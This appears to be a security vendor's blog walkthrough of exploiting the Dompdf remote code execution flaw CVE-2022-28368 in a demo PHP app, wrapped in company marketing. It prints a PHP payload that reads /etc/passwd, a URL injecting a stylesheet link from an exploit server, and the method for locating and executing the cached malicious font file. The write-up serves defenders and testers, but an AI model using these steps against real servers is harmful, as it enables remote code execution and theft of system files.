Every Solution You Can Imagine – and More
What cybersecurity solution do you need? From Zero Trust to ADR, IAM, risk/privacy, data protection, AppSec and threat, securing digital transformation, to resiliency and remediation, we can build the right program to help solve your challenges.
A Single Partner for Everything You Need
Optiv works with more than 400 world-class security technology partners. By putting you at the center of our unmatched ecosystem of people, products, partners and programs, we accelerate business progress like no other company can.
We Are Optiv
Greatness is every team working toward a common goal. Winning in spite of cyber threats and overcoming challenges in spite of them. It’s building for a future that only you can create or simply coming home in time for dinner.
However you define greatness, Optiv is in your corner. We manage cyber risk so you can secure your full potential.
Exploiting RCE Vulnerability in Dompdf
One of the options for converting or downloading the content from an HTML page of a web application is PDF. This necessitates the conversion of an HTML page into a PDF file. This conversion can be easily done by the browsers which let us print or save the HTML page to a PDF document. However, there are various scenarios where conversion of HTML content to PDF is not feasible by the browsers. For example, generating a PDF document from the HTML and CSS code or from the HTML content inside a frame of a web application. Additionally, there can be other functionality requirements that require HTML to PDF conversion outside of web browsers. This is where HTML to PDF conversion libraries come into the picture, such as Dompdf. It is one of the popular PHP libraries used to convert HTML content to PDF files. According to Dompdf's composer page, as of the time of writing this blog, it had around 54,951,888 installs.
It is critical for application security practitioners, developers, and other stakeholders to keep an eye on vulnerabilities affecting such a commonly used PHP library. In March 2022, security researchers from Positive Security identified a remote code execution (RCE) vulnerability in Dompdf. It was identified that Dompdf version <=1.2.0 is prone to remote code execution, which is mapped to CVE-2022-28368. In this blog, we will discuss this vulnerability in detail through a working demo. Understanding the fundamentals of the vulnerability and detailed steps to exploit it will be helpful in identifying, reproducing, and fixing it.
Dompdf version <= 1.2.0 is prone to remote code execution (RCE) when the "$isRemoteEnabled" configuration parameter is set to "true" and on version <= 0.8.5, it is prone to RCE irrespective of this configuration. Parameter "$isRemoteEnabled" allows Dompdf to access remote sites for images and CSS files as required. This feature is exploited to inject malicious CSS files into Dompdf and trick it to execute the malicious PHP payload.
To demonstrate how Dompdf can be exploited, I created a sample PHP website which will be referred as "Demo application" throughout this blog. The Demo application has the Dompdf library and an index.php page in the root directory.
The demo application is a simple one-page website that converts an HTML page to a PDF file using Dompdf . It takes the HTML code as an input and outputs the formatted PDF. Below mentioned snippet shows the source code of the “index.php” file.
I also created an exploit server which has a malicious CSS file and a malicious font file "DejaVuSerif.php" hosted in the root directory. This is the malicious CSS file which will be referenced by the Demo application.
The font-face CSS rule defined in the malicious.css file points to the malicious font file “DejaVuSerif.php”.
The font file "DejaVuSerif.php" is created by changing the extension of the original "DejaVuSerif.ttf" file and adding a malicious payload at the end of the file. While processing the font file, the “php-font-lib” library in dompdf does not validate the extension of the font file, it only validates the file headers for a .ttf font file. File "DejaVuSerif.php" has a valid header of .ttf font file, a php payload and a modified extention ".php". The below snippet shows an inserted php payload at the end of the DejaVuSerif font file.
PHP payload : <?php system(‘cat /etc/passwd’); ?>
Run the demo application using PHP's built-in web server.
From a second command line, run the exploit server using PHP's built-in web server.
The demo application is running, and the landing page of the application can be converted to a PDF file by passing the "pdf" parameter to the “index.php” page.
URL : http://[demo app ip]:7780/index.php
The parameter "pdf" is passed to the index.php page of the demo application in the URL. This causes the application to convert the HTML page to a PDF file using Dompdf library.
URL : http://[demo app ip]:7780/index.php?pdf
In real-world testing engagements, when we encounter unique functionalities in web applications, it is critical to fingerprint as much of the application's tech stack as possible, including hosting server components and any libraries that are in play. In this case, we would download the PDF and extract the metadata of the document to inspect this information. Here we leverage the tool “Exiftool” to extract the PDF metadata. The extracted metadata clearly shows the library and its version in use, which is Dompdf 1.2.0.
Now let us create a PDF file using the font style defined in a malicious CSS file hosted on the remote site. There are different ways to reference a remote CSS file when creating a PDF file. It depends on how it is coded in the application. In our case, we are referencing it by passing it as a parameter to the index.php page. Additionally, if "$isRemoteEnabled" parameter is set to "true", a CSS file from the remote site will be fetched and rendered. In a real-world situation, if the application sends the HTTP request to the exploit server requesting the malicious CSS file, it would mean that "$isRemoteEnabled" parameter is set to "true".
URL : http://[demo app ip]:7780/index.php?pdf&heading=<link rel=stylesheet href='http://[exploit server ip]:7781/malicious.css'>
The Demo application receives an HTTP GET request that references the malicious CSS file hosted on the exploit server.
The Demo application server processes the HTTP request and initiates a new HTTP request to the exploit server requesting malicious.css file which in turn calls the malicious font file "DejaVuSerif.php" as per the font face CSS rule. This confirms that the "$isRemoteEnabled" parameter is set to “true” in the Dompdf’s configuration in the Demo application.
When the font style defined in a remote CSS file is loaded and processed, it makes a second call to the malicious font file "DejavuSerif.php", which has a malicious payload. Dompdf executes the malicious payload in the “DejaVuSerif.php” font file and caches the file locally in the /libs/fonts sub-directory, and adds a corresponding entry in dompdf_font_family_cache.php. The cached font file has font’s data and the output of the malicious PHP command.
Font file entry added in the dompdf_font_family_cache.php
The filename of the cached font file is deterministic and can be derived easily. It comprises of the fontname, style and md5 hash of the remote URL.
Filename = fontname+_+style+_+md5 hash+.+file extension
Which in this case is:
Md5 hash of “http://[exploit server ip]:7781/DejaVuSerif.php” is 6acd2ea0820470d1cd5a983befed0cdc
Hence, our filename is “dejavuserif_normal_6acd2ea0820470d1cd5a983befed0cdc.php”
If dompdf is installed in a web-accessible directory, then an adversary can access the cached font file under the /libs/fonts directory and view the output of the executed command. The below mentioned snippet shows the output of the “cat /etc/passwd” command.
URL : http://[demo app ip]:7780/dompdf/lib/fonts/dejavuserif_normal_6acd2ea0820470d1cd5a983befed0cdc.php
Optiv Security: Secure greatness.™
Optiv is the cyber advisory and solutions leader, delivering strategic and technical expertise to nearly 6,000 companies across every major industry. We partner with organizations to advise, deploy and operate complete cybersecurity programs from strategy and managed security services to risk, integration and technology solutions. With clients at the center of our unmatched ecosystem of people, products, partners and programs, we accelerate business progress like no other company can. At Optiv, we manage cyber risk so you can secure your full potential. For more information, visit www.optiv.com.
Let us know what you need, and we will have an Optiv professional contact you shortly.